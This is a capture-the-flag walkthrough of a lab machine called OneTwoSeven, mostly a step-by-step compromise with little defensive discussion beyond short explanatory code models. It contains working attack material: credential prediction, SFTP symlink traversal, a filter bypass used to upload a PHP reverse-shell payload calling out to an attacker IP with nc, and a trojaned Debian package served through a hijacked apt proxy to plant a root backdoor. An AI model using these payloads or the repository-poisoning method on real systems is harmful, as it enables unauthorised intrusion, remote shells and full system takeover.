[Meachines] [Hard] OneTwoSeven SFTP-Symlinks+SWP+SSH-forward+apt-get-PE+Tyrant

2025-04-25

Information Gathering

IP Address    Open Ports
10.10.10.133  TCP: 22, 80

$ ip='10.10.10.133'; itf='tun0'; if nmap -Pn -sn "$ip" | grep -q "Host is up"; then echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"; ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//'); if [ -n "$ports" ]; then echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"; nmap -Pn -sV -sC -p "$ports" "$ip"; else echo -e "\e[31m[!] No open ports found on $ip.\e[0m"; fi; else echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"; fi

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.2p1 Debian 2+deb12u1 (protocol 2.0)
| ssh-hostkey:
|   256 32b7f3e26dac943e6f11d805b9695845 (ECDSA)
|_  256 355204dc32691ab7527606e36c171ead (ED25519)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Page moved.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Predicting Logins

http://10.10.10.133/index.php

http://10.10.10.133/signup.php

# echo '10.10.10.133 onetwoseven.htb'>>/etc/hosts

$ sftp ots-zNWZlMDQ@10.10.10.133

a335fe04

ots-zNWZlMDQ
a335fe04

$ for hash in md5; do echo -n 10.10.16.27 | ${hash}sum; done

The user's password is the first 8 characters of the MD5 hash of the user's IP address.

The username is a substring of the base64 encoding of the md5sum output.

$ for hash in md5; do echo -n "${hash}: ";echo -n 10.10.16.27 | ${hash}sum | base64 -w0; echo; done

Guessing the local user's password

$ echo ots-$(echo -n "127.0.0.1" | md5sum | base64 | cut -c4-11)

ots-yODc2NGQ

$ echo -n "127.0.0.1" | md5sum| cut -c-8

f528764d

$ sftp ots-yODc2NGQ@10.10.10.133

User.txt

a479fec775507b7018411c9dba84a7d6

SFTP Symlinks && SWP recover

sftp> symlink /etc/passwd passwd

$ curl 'http://onetwoseven.htb/~ots-yODc2NGQ/passwd'

sftp> symlink / root.

http://onetwoseven.htb/~ots-yODc2NGQ/root./

$ wget http://onetwoseven.htb/~ots-yODc2NGQ/root./var/www/html-admin/.login.php.swp

$ vim -r .login.php.swp

ots-admin
11c5a42c9d74d5442ef3cc835bda1b3e7cc7f494e704a10d0de426b2fbe5cbd8

Homesweethome1

SSH only forward && OTS Addon Manager && virtual parameter bypass

$ ssh -N -D 1090 ots-yODc2NGQ@10.10.10.133

-N: do not execute a remote command; only establish the SSH connection and keep the port forwarding up.

http://127.0.0.1:60080/

http://127.0.0.1:60080/menu.php?addon=addons/ots-man-addon.php

<?php
session_start();
if (!isset ($_SESSION['username'])) { header("Location: /login.php"); };
if ( strpos($_SERVER['REQUEST_URI'], '/addons/') !== false ) { die(); };
# OneTwoSeven Admin Plugin
# OTS Addon Manager
switch (true) {
    # Upload addon to addons folder.
    case preg_match('/\/addon-upload.php/',$_SERVER['REQUEST_URI']):
        if(isset($_FILES['addon'])){
            $errors= array();
            $file_name = basename($_FILES['addon']['name']);
            $file_size =$_FILES['addon']['size'];
            $file_tmp =$_FILES['addon']['tmp_name'];
            if($file_size > 20000){
                $errors[]='Module too big for addon manager. Please upload manually.';
            }
            if(empty($errors)==true) {
                move_uploaded_file($file_tmp,$file_name);
                header("Location: /menu.php");
                header("Content-Type: text/plain");
                echo "File uploaded successfull.y";
            } else {
                header("Location: /menu.php");
                header("Content-Type: text/plain");
                echo "Error uploading the file: ";
                print_r($errors);
            }
        }
        break;
    # Download addon from addons folder.
    case preg_match('/\/addon-download.php/',$_SERVER['REQUEST_URI']):
        if ($_GET['addon']) {
            $addon_file = basename($_GET['addon']);
            if ( file_exists($addon_file) ) {
                header("Content-Disposition: attachment; filename=$addon_file");
                header("Content-Type: text/plain");
                readfile($addon_file);
            } else {
                header($_SERVER["SERVER_PROTOCOL"]." 404 Not Found", true, 404);
                die();
            }
        }
        break;
    default:
        echo "The addon manager must not be executed directly but only via<br>";
        echo "the provided RewriteRules:<br><hr>";
        echo "RewriteEngine On<br>";
        echo "RewriteRule ^addon-upload.php addons/ots-man-addon.php [L]<br>";
        echo "RewriteRule ^addon-download.php addons/ots-man-addon.php [L]<br><hr>";
        echo "By commenting individual RewriteRules you can disable single<br>";
        echo "features (i.e. for security reasons)<br><br>";
        echo "<font size='-2'>Please note: Disabling a feature through htaccess leads to 404 errors for now.</font>";
        break;
}
?>

1. Checks whether the current request URL contains /addons/. If it does, the script stops immediately (die()), preventing direct access to the /addons/ directory. This protection is meant to keep the addon manager from being requested directly.
2. Checks whether the URL contains /addon-upload.php. If an addon file (addon) is uploaded, the code checks its size. If the file exceeds 20KB (20000 bytes), an error is shown and the user is told to upload manually; otherwise the addon file is moved into the current directory (move_uploaded_file()), followed by a redirect to menu.php and a success message.
3. If the URL contains /addon-download.php, it checks whether the GET request carries an addon parameter. If so, the code looks for the matching addon file on the server. If the file exists, readfile() outputs its contents and the browser downloads the addon file.

The file /addon-upload.php does not exist, so its rewrite rule never matches.

Going through the existing /addon-download.php and appending a dummy parameter containing /addon-upload.php/ lands the request in the upload branch.
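A model of the dispatch logic above, added here as an example written for this write-up (not the application's own code): dispatch_original mirrors the PHP switch(true) order over the full REQUEST_URI, rewrite() models which RewriteRules are enabled, and dispatch_hardened is an assumed fix that decides on the URL path only.

```python
import re
from urllib.parse import urlsplit

# Model of the OTS addon manager dispatch written for this write-up (not the
# application's own code). The original PHP picks its branch with preg_match()
# over $_SERVER['REQUEST_URI'], which still carries the query string.
REWRITE_RULES = {  # RewriteRule ^addon-upload.php / ^addon-download.php -> manager
    "upload": re.compile(r"^/addon-upload\.php"),
    "download": re.compile(r"^/addon-download\.php"),
}
MANAGER = "addons/ots-man-addon.php"

def rewrite(request_uri, enabled):
    """Apache-side step: only an enabled RewriteRule sends the request to the
    manager; otherwise the nonexistent file is a 404 (as the page notes)."""
    path = urlsplit(request_uri).path
    if path == "/" + MANAGER:          # the real file, requested directly
        return MANAGER
    for name, rule in REWRITE_RULES.items():
        if name in enabled and rule.search(path):
            return MANAGER
    return None

def dispatch_original(request_uri):
    """Mirror of the PHP switch(true): the upload case is tested first."""
    if "/addons/" in request_uri:      # die() on direct /addons/ access
        return "blocked"
    if re.search(r"/addon-upload\.php", request_uri):
        return "upload"
    if re.search(r"/addon-download\.php", request_uri):
        return "download"
    return "default"

def dispatch_hardened(request_uri):
    """Assumed fix: decide on the URL path only, exact match, so query-string
    content cannot select a branch whose rewrite was disabled."""
    path = urlsplit(request_uri).path
    if path.startswith("/addons/"):
        return "blocked"
    if path == "/addon-upload.php":
        return "upload"
    if path == "/addon-download.php":
        return "download"
    return "default"

def handle(request_uri, enabled, hardened=False):
    """Full path of a request: rewrite first, then the manager's branch."""
    if rewrite(request_uri, enabled) is None:
        return "404"
    return (dispatch_hardened if hardened else dispatch_original)(request_uri)
```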

POST /addon-download.php?a=/addon-upload.php/ HTTP/1.1
Host: 127.0.0.1:60080
Content-Length: 293
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="111", "Not(A:Brand";v="8"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1:60080
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryphFWTRQZGfBr7typ
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.65 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://127.0.0.1:60080/menu.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=utv3fif568kneancj1ra4t3904
Connection: close

------WebKitFormBoundaryphFWTRQZGfBr7typ
Content-Disposition: form-data; name="addon"; filename="1.php"
Content-Type: application/x-php

GTF89A
<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.16.27 443 >/tmp/f');?>
------WebKitFormBoundaryphFWTRQZGfBr7typ--

Privilege Escalation: apt-get && DNS hijack && http_proxy && Tyrant

www-admin-data@onetwoseven:/etc/apt$ cat sources.list.d/onetwoseven.list

Resolve packages.onetwoseven.htb to the Arch host.

arch# echo '10.10.16.27 packages.onetwoseven.htb'>>/etc/hosts

arch$ pip install --upgrade proxy.py

arch$ proxy --hostname 0.0.0.0 --port 10000

www-admin-data$ export http_proxy=http://10.10.16.27:10000

Look up the currently installed packages.

www-admin-data@onetwoseven:/etc/apt$ dpkg -l | head -20

ii telnet 0.17-41 amd64

arch$ wget http://ftp.de.debian.org/debian/pool/main/n/netkit-telnet/telnet_0.17-42_amd64.deb

arch$ dpkg-deb -R telnet_0.17-42_amd64.deb evil_deb

arch$ vim ./evil_deb/DEBIAN/postinst

Add /tmp/tyrant to the postinst script.

arch$ dpkg-deb -b ./evil_deb/ telnet_0.17-42_amd64.deb

Get the telnet entry from the server's Packages metadata.

www-admin-data$ cat /var/lib/apt/lists/de.deb.devuan.org_merged_dists_ascii_main_binary-amd64_Packages | grep -A 18 "Package: telnet$"

Get the hashes of the evil deb.

arch$ ls -la telnet_0.17-42_amd64.deb;md5sum telnet_0.17-42_amd64.deb; sha256sum telnet_0.17-42_amd64.deb

09c8645d8775a4ea3e2e2a9d4cafabdc  telnet_0.17-42_amd64.deb
a93b2287e52518446a4f8097a8a3a605e41a4242a8b9555c08b0d7b4c3f83e73  telnet_0.17-42_amd64.deb

Create the Packages file.

Package: telnet
Version: 0.17-42
Installed-Size: 157
Maintainer: Mats Erik Andersson <mats.andersson@gisladisker.se>
Architecture: amd64
Replaces: netstd
Provides: telnet-client
Depends: netbase, libc6 (>= 2.15), libstdc++6 (>= 5)
Description: basic telnet client
Description-md5: 80f238fa65c82c04a1590f2a062f47bb
Source: netkit-telnet
Tag: admin::login, interface::shell, network::client, protocol::ipv6, protocol::telnet, role::program, uitoolkit::ncurses, use::login
Section: net
Priority: standard
Filename: pool/DEBIAN/main/n/netkit-telnet/telnet_0.17-42_amd64.deb
Size: 71028
MD5sum: 09c8645d8775a4ea3e2e2a9d4cafabdc
SHA256: a93b2287e52518446a4f8097a8a3a605e41a4242a8b9555c08b0d7b4c3f83e73

arch$ gzip Packages -c > Packages.gz

www-admin-data@onetwoseven:/$ cat /var/lib/apt/lists/de.deb.devuan.org_merged_dists_ascii-updates_Release | head -15

Origin: Devuan
Label: Devuan
Suite: stable-updates
Version: 2.0.0
Codename: ascii-updates
Date: Sun, 25 Aug 2019 20:46:02 UTC
Architectures: amd64 arm64 armel armhf i386 ppc64el
Components: main contrib non-free
SHA256:
 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 0 contrib/binary-armhf/Packages
 0ba877606ba38ef307382bf2cf41b991c248499f9d549e1224d493258e6f2fea 949 main/debian-installer/binary-i386/Packages.gz
 e167af9851b8226953161338dadf89d089402e1a39dfd8859a684311f09c00a5 29 contrib/binary-armel/Packages.gz
 4cadad0c317172a52bf4e1cac8c9f2627c72d54764c1b756def196b513cef5cc 29 non-free/debian-installer/binary-amd64/Packages.gz
 cc826c85a01b615920b39ed0eb995a09354452ec6bfe8a41e2887f697e8ab57f 29 contrib/binary-amd64/Packages.gz
 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 0 non-free/binary-all/Packages

arch$ ls -l Packages*; sha256sum Packages*

2c0affea6242c314455189272c7755d261104a66426476e43121433173214516  Packages
8fec70cc6b2d80ad6bb874acb975e32134d81614b70080213b6826aaf58789a3  Packages.gz

Create the Release file.

Origin: Devuan
Label: Devuan
Suite: stable
Version: 2.0.0
Codename: ascii
Date: Sun, 26 Aug 2019 00:46:02 UTC
Architectures: amd64 arm64 armel armhf i386 ppc64el
Components: main
SHA256:
 2c0affea6242c314455189272c7755d261104a66426476e43121433173214516 697 main/binary-amd64/Packages
 8fec70cc6b2d80ad6bb874acb975e32134d81614b70080213b6826aaf58789a3 493 main/binary-amd64/Packages.gz

arch$ mkdir -p devuan/dists/ascii/main/binary-amd64/
arch$ mkdir -p devuan/pool/DEBIAN/main/n/netkit-telnet/

arch$ cp telnet_0.17-42_amd64.deb devuan/pool/DEBIAN/main/n/netkit-telnet/

arch$ cp Release devuan/dists/ascii/

arch$ cp Packages devuan/dists/ascii/main/binary-amd64/

arch$ cp Packages.gz devuan/dists/ascii/main/binary-amd64/

arch$ python3 -m http.server 80

arch$ proxy --hostname 0.0.0.0 --port 10000
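An added example, not from the write-up or from apt itself: a small parser for the Release hash block shown above, the size-plus-SHA256 consistency check apt applies to an index against Release, and the rendering step that keeps a repository's hashes consistent (the sha256sum bookkeeping done by hand above; the same job apt-ftparchive release does). The sample Release text is constructed. The point for defenders is that hash agreement only proves the mirror is self-consistent; without a signature from a trusted key (InRelease or Release.gpg) an unsigned Release can simply be regenerated, which is what lets the http_proxy plus DNS hijack above succeed.

```python
import hashlib

# Constructed sample in the Release format shown above; the digest listed is
# that of an empty (0-byte) index, as Release files carry for absent indexes.
SAMPLE_RELEASE = """Origin: Devuan
Label: Devuan
Suite: stable
Codename: ascii
Architectures: amd64
Components: main
SHA256:
 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 0 main/binary-amd64/Packages
"""

def parse_release_sha256(release_text):
    """Map relative index path -> (sha256 hex, size) from the SHA256: block.
    Entries are the space-indented lines that follow the 'SHA256:' field."""
    entries, in_block = {}, False
    for line in release_text.splitlines():
        if line.startswith("SHA256:"):
            in_block = True
            continue
        if in_block:
            if not line.startswith(" "):
                break  # the next unindented field ends the block
            digest, size, path = line.split()
            entries[path] = (digest.lower(), int(size))
    return entries

def verify_index(release_text, rel_path, index_bytes):
    """The size + SHA256 check apt applies to a fetched index against Release.
    A match proves consistency with Release, not authenticity: an unsigned
    Release can be regenerated by whoever answers for the mirror."""
    entry = parse_release_sha256(release_text).get(rel_path)
    if entry is None:
        return False
    digest, size = entry
    return len(index_bytes) == size and hashlib.sha256(index_bytes).hexdigest() == digest

def render_release(indexes, suite="stable", codename="ascii"):
    """Emit a minimal unsigned Release whose SHA256 block matches `indexes`
    ({rel_path: bytes}); this is the bookkeeping apt-ftparchive release does."""
    lines = ["Origin: Devuan", f"Suite: {suite}", f"Codename: {codename}",
             "Architectures: amd64", "Components: main", "SHA256:"]
    for path, data in sorted(indexes.items()):
        lines.append(f" {hashlib.sha256(data).hexdigest()} {len(data)} {path}")
    return "\n".join(lines) + "\n"
```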

www-admin-data$ wget https://github.com/MartinxMax/Tyrant/releases/download/version-2.0/tyrant

www-admin-data$ sudo /usr/bin/apt-get update

www-admin-data$ sudo /usr/bin/apt-get upgrade

Tyrant was successfully injected into the system.

www-admin-data@onetwoseven:/tmp$ ./tyrant -uid 0 -rhost 10.10.16.27 -rport 10031

Root.txt

7a5b069b4c8ce1ecb5990d58d64939ba
